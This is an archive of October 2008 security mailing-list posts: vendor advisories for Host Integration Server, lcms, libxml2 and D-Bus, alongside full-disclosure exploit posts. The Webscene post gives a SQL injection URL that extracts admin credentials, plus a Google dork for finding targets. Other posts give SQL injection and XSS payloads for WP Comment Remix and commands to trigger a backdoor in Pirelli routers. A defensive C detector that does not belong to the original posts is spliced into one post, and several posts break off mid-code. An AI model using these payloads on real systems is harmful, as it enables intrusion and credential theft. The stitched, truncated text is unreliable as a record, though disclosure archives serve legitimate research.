iDefense Security Advisory 10.14.08: Microsoft Host Integration Server 2006 Command Execution Vulnerability

2008-10-14 Thread iDefense Labs

iDefense Security Advisory 10.14.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 14, 2008

I. BACKGROUND

The Host Integration Server is an application suite that is used to
communicate with IBM mainframe servers. One of the components of the
suite is a remote management interface. This interface is implemented
by an RPC server that listens on a dynamic TCP port. The UUID of the
vulnerable RPC service is 'ed6ee250-e0d1-11cf-925a-00aa00c006c1'. For
more information regarding the Host Integration Server, see the
vendor's website found at the following URL.

http://www.microsoft.com/hiserver/default.mspx

II. DESCRIPTION

Remote exploitation of an arbitrary command execution vulnerability in
Microsoft Corp.'s Host Integration Server 2006 could allow an attacker
to execute arbitrary code with the privileges of the affected service.

The RPC interface exposes several methods that an unauthenticated
attacker can use to execute arbitrary programs on the server. RPC
opcodes 1 and 6 both allow an attacker to call the CreateProcess()
function with full control over the application started, as well as the
command line passed to it. This allows an attacker to run arbitrary
programs on the server.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the affected service. The privileges gained
depend on the user account that the Host Integration Server is
configured to use during installation. The service does not require
SYSTEM privileges to run.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Host
Integration Server 2006. Previous versions may also be affected.

V. WORKAROUND

Use the Service Control Manager to disable the SNA RPC service, and
prevent it from starting automatically. This will prevent the
vulnerable service from running, but will also prevent remote
management. Firewalling the TCP port is not a valid workaround, since
the port used for communication is dynamically assigned when the
service starts.

VI. VENDOR RESPONSE

Microsoft has officially addressed this vulnerability with Security
Bulletin MS08-059. For more information, consult their bulletin at the
following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-059.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3466 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/27/2008  Initial vendor notification.
05/27/2008  Initial vendor response.
10/14/2008  Coordinated public disclosure.

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


[USN-652-1] LittleCMS vulnerability

2008-10-14 Thread Kees Cook
===
Ubuntu Security Notice USN-652-1   October 14, 2008
lcms vulnerability
CVE-2007-2741
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  liblcms1                        1.13-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Chris Evans discovered that certain ICC operations in lcms were not
correctly bounds-checked.  If a user or automated system were tricked
into processing an image with malicious ICC tags, a remote attacker could
crash applications linked against liblcms1, leading to a denial of service,
or possibly execute arbitrary code with user privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13-1ubuntu0.1.diff.gz
  Size/MD5:13103 4617c440a02960e1f962a88c1c21a9cc
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13-1ubuntu0.1.dsc
  Size/MD5:  685 507f6385801f19716737a5089d33116d
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13.orig.tar.gz
  Size/MD5:   585735 e627f43bbbd238895502402d942a6cfd

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_amd64.deb
  Size/MD5:   136682 f085666f76c9bf1a53942baa18b8e052

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_amd64.deb
  Size/MD5:   129070 e50c4bfb5b0e32ec7f3da1ce9e1ee21f

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_amd64.deb
  Size/MD5:40296 5c58c601e0d9802394cf25b33319b2c9

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_i386.deb
  Size/MD5:   123518 fd6961be0da7aaf2e2dcb8257d3787da

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_i386.deb
  Size/MD5:   118222 86dcc1004a11232740c2d6d6903f02a4

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_i386.deb
  Size/MD5:37112 d4ffa7a920a4e4aba5f8d197d1ad14f0

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_powerpc.deb
  Size/MD5:   130806 3da85714083d3d4f1252ae0b1b1fe6e3

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_powerpc.deb
  Size/MD5:   131834 38aba2a645449be653dd11be439afcce

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_powerpc.deb
  Size/MD5:44136 04799ca5393e6acc70592f648b6b846a

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_sparc.deb
  Size/MD5:   133960 ab907a81dcb99819e9d125b76a34742c

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_sparc.deb
  Size/MD5:   124964 42864911b8a3f680a7aae8d28701a6c1

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_sparc.deb
  Size/MD5:38498 5d040f607c0ec6d411349b0d27b52e73





Webscene eCommerce (level) Remote Sql Injection

2008-10-14 Thread angel
#
#  Webscene eCommerce (level) Remote Sql Injection
#
#  vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#
#  Bug Found By : Angela Chang (14-10-2008)
#
#  contact: angel[at]ch4ng.cc
#
#  Greetz: nyubi & Vrs-Chk
#
###



vuln file : productlist.php

Input passed to the "level" parameter is not properly verified
before being used. This can be exploited to perform remote SQL
injection.

exploit : http://somehost/productlist.php?categoryid=20&level=[sql]

  http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--



Login admin : http://somehost/admin/



 

Google dork : inurl:productlist.php?categoryid= level





 





[SECURITY] [DSA 1654-1] New libxml2 packages fix execution of arbitrary code

2008-10-14 Thread Steve Kemp

--------------------------------------------------------------------------
Debian Security Advisory DSA-1654-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                               Steve Kemp
October 14, 2008                      http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: libxml2
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-3529
Debian Bug : 498768

It was discovered that libxml2, the GNOME XML library, didn't correctly
handle long entity names.  This could allow the execution of arbitrary
code via a malicious XML file.

For the stable distribution (etch), this problem has been fixed in version
2.6.27.dfsg-5.

For the unstable distribution (sid), this problem has been fixed in
version 2.6.32.dfsg-4.

We recommend that you upgrade your libxml2 package.


Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives:

  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.diff.gz
Size/MD5 checksum:   220443 48cafbb8d1bd2c6093339fea3f14e4a0
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz
Size/MD5 checksum:  3416175 5ff71b22f6253a6dd9afc1c34778dec3
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.dsc
Size/MD5 checksum:  893 0dc1f183dd20741e5b4e26a7f8e1c652

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-5_all.deb
Size/MD5 checksum:  1328144 c1c5f0ceb391893a94e61c074b677ee9

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:   820850 fac5556241bb0fde20913f25fb9c73ac
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:37980 725b1c6925e610b5843ba0ad554dc7bc
  
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:   184754 5ccbaf07b44dcfe528167074050bf270
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:   916830 17d71480b7e2a447dabde99c11d752fa
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:   881834 cac19a28b37f7afb9e07966f44ddd5b2

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:   184130 a13372752d162d0fb2ccd58da6b73e20
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:36684 8a0265229bebf9245dc7bb7cc6f41d36
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:   796194 6019e59020269cca8fa8fea40f83c118
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:   891922 606fc28448bead2709c39a1d3e529a25
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:   745758 95bd39eb2818772c43c3351b22326fcd

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:   741876 1b670c6bac3aa9f7df28f7ea3f1e5725
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:34678 9a992dc251b137a919a813eed2af8489
  
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:   165290 732b4e94b91a086c6b950d187af160bc
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:   817514 299c93a812ac02a8aa9da88f4cb5aedf
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:   673192 d2ff2c26ee8dae05f81c24aa6dfce9b5

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_hppa.deb
Size/MD5 checksum:   191876 4d2e33090237b47bc10e9526329f0bc5
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-

[USN-653-1] D-Bus vulnerabilities

2008-10-14 Thread Kees Cook
===
Ubuntu Security Notice USN-653-1   October 14, 2008
dbus vulnerabilities
CVE-2008-0595, CVE-2008-3834
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libdbus-1-2 0.60-6ubuntu8.3

Ubuntu 7.04:
  libdbus-1-3 1.0.2-1ubuntu4.2

Ubuntu 7.10:
  libdbus-1-3 1.1.1-3ubuntu4.2

Ubuntu 8.04 LTS:
  libdbus-1-3 1.1.20-1ubuntu3.1

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

Havoc Pennington discovered that the D-Bus daemon did not correctly
validate certain security policies.  If a local user sent a specially
crafted D-Bus request, they could bypass security policies that had a
"send_interface" defined. (CVE-2008-0595)

It was discovered that the D-Bus library did not correctly validate
certain corrupted signatures.  If a local user sent a specially crafted
D-Bus request, they could crash applications linked against the D-Bus
library, leading to a denial of service. (CVE-2008-3834)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3.diff.gz
  Size/MD5:   101072 91db84be3ea61eff0348fc42600fa597
http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3.dsc
  Size/MD5: 1172 7bf2e49310068b1302d60e231ebd0878
http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60.orig.tar.gz
  Size/MD5:  1674899 da9561b5e579cedddc34f53427e99a93

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-doc_0.60-6ubuntu8.3_all.deb
  Size/MD5:  1655972 ef345c4b84a966586b31604caf62742c

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-cil_0.60-6ubuntu8.3_all.deb
  Size/MD5:   188332 3955ccbcfdec107796c969ec2d60e455

http://security.ubuntu.com/ubuntu/pool/universe/d/dbus/monodoc-dbus-1-manual_0.60-6ubuntu8.3_all.deb
  Size/MD5:   179500 44024ceebfad7ee32cf4847ceb6b3a71

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-utils_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   174908 ab9ed41b239f04c6b82e9197c1408a38

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   355310 ded0be33cf24d3a21af2d55b8638a42e

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-2_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   265188 56f5086e786f651384bbb780acae9dd2

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-dev_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   329094 1d27f1fc99baa126c26ff9168e885cc5

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-2_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   199644 9c14e1470d73c46cabff3053a42e78eb

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-dev_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   242656 41fbcad27a6c45cf68b3d7b178218a4e

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-1c2_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   173358 bb279da93ccc27e9a64cd57ea1e18817

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-dev_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   178754 98c5ca22fbf92760346112dca78cfe0c

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/python2.4-dbus_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   284604 71c38fb8e22faa11ca9ca5e7f1fa501b

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-utils_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   171382 a177f78f62fc121028276d9d02ea3e3b

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   324652 c40bd701686fe1c80e8ddd43039b6740

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-2_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   246972 a6d76f44725163f972ecd4aba36ff3b0

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-dev_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   296248 28a5e2b0b3bf2096cf3eeaaffca366b9

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-2_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   191726 1cedfbbd185b496d275935fa72a2d12a

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-dev_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   226512 90777a6ce67e4b3add23263b57ef089d

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-1c2_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   172326 c0db53b6ce9137d38cdeb2552d0f9931

http://security.ub

Telecom Italia Alice Pirelli routers backdoor discovered to activate telnet/ftp/tftp from internal LAN/WLAN.

2008-10-14 Thread drpepppperone
#

saxdax & drpepperONE


Discovered embedded backdoor to activate the telnet/ftp/tftp/web extended admin
interface with Admin privileges, from the internal network LAN, on Alice ADSL CPE
Modem/Routers manufactured by Pirelli based on the Broadcom platform.

#

saxdax & drpepperONE

Router Vendor:  Alice Telecom Italia CPE Modem/Routers manufactured by Pirelli,
                based on the Broadcom platform.

Model Affected: AGA [Alice Gate2 plus Wi-Fi] / AGB [Alice Gate2 plus] /
                AG2P-AG3 [Alice Gate W2+] / AGPV-AGPF [Alice Gate VoIP 2 Plus Wi-Fi]

Firmware Version:   All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware versions are affected.

Platforms:  Customized Linux version 2.6.8.1 on Broadcom BCM96348 chipset.

Vulnerability:  enable telnet/ftp/tftp and web-admin from the internal LAN.

Exploitation:   internal network LAN, versus router

Date:   13 Oct 2008

Authors:    saxdax & drpepperONE

e-mail: [EMAIL PROTECTED]   [EMAIL PROTECTED]

Risk:   medium>low

#

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix

#

===
1) Introduction
===

Telecom Italia is the most important Italian ISP, offering an ADSL service named
"Alice".
With the "Alice ADSL" service, Telecom Italia rents out different CPE Modem/Routers,
among which are the affected ones.
The interfaces to configure these modems are made extremely poor by the provider
to ensure more control.
There's no way to enable telnet, ftp, tftp or more advanced web pages from the
web interface.

http://www.telecomitalia.com/
http://adsl.alice.it/

#


2) Vulnerability


An attacker can activate and get unauthorized access to the router's
administration interface and telnet/ftp/tftp services from the internal network.

Every user in the LAN (or Wireless LAN) can nevertheless have access to the
router's administration interface and telnet/ftp/tftp!

If an attacker can get access to the administrator interface and login, he has
full control over the router's configuration.

#


==
3) The Exploit
==

To enable telnet/ftp/tftp and the web-admin interface it is necessary to send a
special IP packet to the router's specific IP 192.168.1.1.
This works only from the internal LAN, where an attacker has an IP like
192.168.1.XX.
The IP packet sent to the router must have the following features:

1) IP protocol number 255 (there's a RAW SOCKET listening on the router)
2) Payload size 8 bytes
3) The payload is the first 8 bytes of a salted md5 of the MAC address of device
   br0
4) br0 in these modems has the same MAC as eth0

When the modem receives the packet all services will be enabled.


Example:


From a GNU/Linux distribution:

1) Retrieve the br0 MAC address:

arping -I eth0 -c 2 192.168.1.1

ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)


2) Calculate the special md5 hash from the br0 MAC address: create a 6-byte-long
   hex file with the MAC address.
   Run the application below and copy the output hash.
   http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html

3) Send an IP packet to the router IP 192.168.1.1 with the 8-byte payload file
   (with the tool you like)

i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex


4) Telnet to the router:

telnet 192.168.1.1

BCM96348 ADSL Router
Login: admin
Password: 



#


===
4) The Code
===

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the payload of the ip packet */
/* the mac must be in a hex file and has to be passed as argument to the program */

#include 
#include 
#include 
#include "md5.h"


/*
 *  RFC 1321 compliant MD5 implementation
 *
 *  Copyright (C) 2001-2003  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  
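The trigger described in section 3 is a fixed, recognisable shape on the wire: an IPv4 datagram with protocol number 255 carrying exactly 8 payload bytes, addressed to the router. The following is an added example, not the authors' tool, of how a LAN-side sensor could flag that pattern from a raw packet buffer. It performs no hashing and sends nothing; the two sample packets are constructed for the example (placeholder payload bytes, zero checksum), and the function names are mine.

```c
/* Added example (not the authors' tool): flag the trigger packet the post
 * describes, an IPv4 datagram with protocol number 255 and an 8-byte payload,
 * as a sensor on the LAN side would. The sample packets below are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct ipv4_summary {
    uint8_t  proto;        /* IP protocol number (byte 9 of the header) */
    uint16_t payload_len;  /* total length minus header length */
    char     dst[16];      /* dotted-quad destination address */
};

/* Parse the fixed part of an IPv4 header from a raw buffer.
 * Returns 0 on success, -1 if the buffer is too short or internally inconsistent.
 * The header checksum is deliberately not validated: the detector should still
 * fire on a packet the router would act on. */
int parse_ipv4(const uint8_t *pkt, size_t len, struct ipv4_summary *out)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    uint16_t total = (uint16_t)((pkt[2] << 8) | pkt[3]);
    if (ihl < 20 || ihl > len || total < ihl || total > len)
        return -1;
    out->proto = pkt[9];
    out->payload_len = (uint16_t)(total - ihl);
    snprintf(out->dst, sizeof out->dst, "%u.%u.%u.%u",
             (unsigned)pkt[16], (unsigned)pkt[17], (unsigned)pkt[18], (unsigned)pkt[19]);
    return 0;
}

/* Detection rule: protocol 255 carrying exactly 8 payload bytes.
 * Returns 1 on a match, 0 otherwise (including on unparsable input). */
int is_alice_trigger(const uint8_t *pkt, size_t len)
{
    struct ipv4_summary s;
    if (parse_ipv4(pkt, len, &s) != 0)
        return 0;
    return s.proto == 255 && s.payload_len == 8;
}

/* Constructed sample: 20-byte header, proto 0xff, total length 28,
 * 192.168.1.2 -> 192.168.1.1, 8 placeholder payload bytes, checksum left 0. */
static const uint8_t SAMPLE_TRIGGER[28] = {
    0x45, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x40, 0x00, 0x40, 0xff, 0x00, 0x00,
    192, 168, 1, 2,   192, 168, 1, 1,
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08
};

/* Constructed sample: ordinary TCP (proto 6) datagram with an 8-byte payload and
 * the same addresses; must not match because only the protocol differs. */
static const uint8_t SAMPLE_BENIGN[28] = {
    0x45, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x40, 0x00, 0x40, 0x06, 0x00, 0x00,
    192, 168, 1, 2,   192, 168, 1, 1,
    0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08
};

int demo_trigger_detected(void)   { return is_alice_trigger(SAMPLE_TRIGGER, sizeof SAMPLE_TRIGGER); }
int demo_benign_ignored(void)     { return !is_alice_trigger(SAMPLE_BENIGN, sizeof SAMPLE_BENIGN); }
/* A truncated capture (header claims 28 bytes, only 20 present) is rejected, not matched. */
int demo_truncated_rejected(void) { return !is_alice_trigger(SAMPLE_TRIGGER, 20); }
int demo_dst_parsed(void)
{
    struct ipv4_summary s;
    return parse_ipv4(SAMPLE_TRIGGER, sizeof SAMPLE_TRIGGER, &s) == 0
        && strcmp(s.dst, "192.168.1.1") == 0 && s.proto == 255 && s.payload_len == 8;
}

int main(void)
{
    printf("trigger sample flagged: %d\n", demo_trigger_detected());
    printf("tcp sample flagged:     %d\n", !demo_benign_ignored());
    return 0;
}
```

In practice the rule would sit behind whatever capture library feeds raw frames to the sensor; the point here is that protocol 255 is reserved and essentially never appears on a home LAN, so matching on it plus the fixed payload size gives a low-noise alert without needing to know the hash.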

WP Comment Remix 1.4.3 Multiple Vulnerabilities

2008-10-14 Thread g30rg3_x
___
ChX Security |
Advisory #3   |
==

->"WP Comment Remix 1.4.3 Multiple Vulnerabilities"<-

_
Advisory Information |
===
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities
Author: g30rg3_x 
Advisory URL: http://chxsecurity.org/advisories/adv-3-full.txt
Date of last update: 2008-10-13
CVE Name: --


Vulnerability Information |
==
Software: WP Comment Remix
Version: 1.4.3
From: Remote
Severity: Extremely Critical
Impact:
Manipulation of data
Cross-Site Scripting
Type of Advisory: Full Disclosure

_
Software Description |
===
WP Comment Remix adds a plethora of new options and features to
Wordpress. From Reply and Quote links
for commenters, to a full upgrade to the edit comments pages in the
admin panel, WPCR will save you
time and effort when running your blog.


Vulnerability Description |
==
WP Comment Remix has multiple vulnerabilities which allow remote
attackers to conduct SQL Injection,
Cross-Site Scripting and Cross-Site Request Forgery attacks.
The SQL Injection is possible due to lack of filtration on the comment
post ID variable in the AJAX
Comments script.
The Cross-Site Scripting is possible due to lack of filtration and
escaping on several stored
options.
The Cross-Site Request Forgery is caused by the lack of the WordPress
Nonces on the options panel form.

__
Technical Description |

* SQL Injection *
Inside the script "ajax_comments.php" (around lines 27 to 29):

/-
$id = $_GET['p'];

$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE
comment_post_ID = $id AND comment_approved != 'spam' ORDER BY
comment_date DESC");
--/
As you can see in the presented code, the value of $id is taken from the
HTTP GET p variable, and then $id is later used inside the SQL query of the
get_results method of the $wpdb object (which allows WordPress plugin
developers to pull multiple row results from the database), so we can inject
SQL code and the data will later be shown as comment data by the script.

As an example we can inject something like this:
/--
ajax_comments.php?p=0 UNION SELECT
1,2,user(),4,5,6,7,8,CONCAT(database(),0x3C62723E,version()),10,11,12,13,14,15
--
---/
To obtain the MySQL user, Database name and MySQL version used on the server.



* Cross-Site Scripting *
Inside the script "wpcommentremix.php" (around lines 611 to 781)

(The next code is truncated to only show the vulnerable parts of the code)
/--
$options['replytotext'] = $_POST['replytotext'];
...
$options['quotetext'] = $_POST['quotetext'];
$options['originallypostedby'] = $_POST['originallypostedby'];
$options['sep'] = $_POST['sep'];
$options['maxtags'] = $_POST['maxtags'];
...
$options['tagsep'] = $_POST['tagsep'];
$options['tagheadersep'] = $_POST['tagheadersep'];
$options['taglabel'] = $_POST['taglabel'];
$options['tagheaderlabel'] = $_POST['tagheaderlabel'];
...
---/
These variables totally lack filtration and escaping, so if we store
something like this...

/--
5">alert(String.fromCharCode(88,83,83));
http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip

___
Solution |
==
Upgrade to version 1.4.4

___
Timeline |
===
Bug Found: 16/09/2008
Vendor Contact: 20/09/2008
Vendor Response: 23/09/2008
Public Disclosure: 13/10/2008


ChX Security
   http://chxsecurity.org/
 (c) 2008

--
Original: http://chxsecurity.org/advisories/adv-3-full.txt


[RISE-2008001] Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability

2008-10-14 Thread RISE Security
RISE-2008001
Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability

http://risesecurity.org/advisories/RISE-2008001.txt
Published: October 14, 2008
Updated: October 14, 2008

INTRODUCTION

There exists a vulnerability within a function of the Sun Solstice AdminSuite 
sadmind, which when properly exploited can lead to remote compromise of the 
vulnerable system.
This vulnerability was confirmed by us in the following versions of the Sun 
operating system, other versions may be also affected.

Sun Solaris 9 SPARC
Sun Solaris 9 x86
Sun Solaris 8 SPARC
Sun Solaris 8 x86

DETAILS

Solstice AdminSuite is a collection of graphical user interface tools and 
commands used to perform administrative tasks such as managing users, groups, 
hosts, system files, printers, disks, file systems, terminals, and modems.

The distributed system administration daemon (sadmind) is the daemon used by 
Solstice AdminSuite applications to perform distributed system administration 
operations.

The sadmind daemon is started automatically by the inetd daemon whenever a 
request to invoke an operation is received. The sadmind daemon process 
continues to run for 15 minutes after the last request is completed, unless a 
different idle-time is specified with the -i command line option. The sadmind 
daemon may be started independently from the command line, for example, at 
system boot time. In this case, the -i option has no effect; sadmind continues 
to run, even if there are no active requests.

The vulnerable function adm_build_path() does not validate user supplied 
data when appending it to a stack-based buffer using strcat(), resulting in a 
stack-based buffer overflow. The exploitation of this vulnerability is trivial 
and results in remote compromise of the vulnerable system.
This is the debug information about this vulnerability (from Sun Solaris 9 x86).


Breakpoint 1, 0xd330e5b0 in adm_build_path ()
   from /usr/snadm/lib/libadmapm.so.2
(gdb) until *adm_build_path+38
0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) x/i $pc 
0xd330e5c6 : call   0xd3304fa8 <[EMAIL PROTECTED]>
(gdb) x/x $esp+4
0x80411e4:  0x080b7cd0
(gdb) x/x $esp  
0x80411e0:  0x08041208
(gdb) x/s 0x080b7cd0
0x80b7cd0:   'A' ...
(gdb) x/s 0x08041208
